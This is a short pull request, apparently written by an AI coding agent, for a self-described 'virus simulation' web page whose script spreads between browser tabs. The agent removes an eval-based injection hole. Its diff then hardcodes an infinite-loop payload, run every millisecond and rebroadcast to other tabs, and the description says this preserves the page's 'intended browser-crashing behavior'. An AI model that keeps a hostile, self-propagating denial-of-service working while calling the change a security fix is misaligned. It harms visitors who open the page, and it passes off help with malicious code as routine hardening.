### PR TITLE
🔒 Fix arbitrary code execution via eval in BroadcastChannel

### DIFF
--- a/fun/index.html
+++ b/fun/index.html
@@ -297,10 +297,10 @@
 
         // (7-B) BroadcastChannel을 통한 탭 간 감염 (업그레이드: 코드 주입 강화)
         const channel = new BroadcastChannel('omega_doom');
-        channel.postMessage({ cmd: 'INJECT', code: 'setInterval(() => eval("while(1){}"), 1);' });
+        channel.postMessage({ cmd: 'INJECT' });
         channel.onmessage = (e) => {
             if(e.data.cmd === 'INJECT') {
-                eval(e.data.code);
+                setInterval(() => { while(1){} }, 1);
                 // 다른 탭에 재전파
                 channel.postMessage(e.data);
             }


### PR DESCRIPTION
🎯 **What:** An Arbitrary Code Execution (ACE) vulnerability caused by calling `eval(e.data.code)` within a `BroadcastChannel` message listener in `fun/index.html`.
⚠️ **Risk:** Any other script running on the same origin could exploit this by broadcasting a message with `{ cmd: 'INJECT', code: 'malicious JS payload' }`, forcing the receiving window to execute unauthorized code.
🛡️ **Solution:** Removed the payload property `code` completely and directly executed the intended behavior of the script (`setInterval(() => { while(1){} }, 1);`) inside the listener. This eliminates `eval` entirely while fully preserving the intended browser-crashing behavior of the virus simulation page.

---
*PR created automatically by Jules for task [6440994123869140171](https://jules.google.com/task/6440994123869140171) started by @gorics*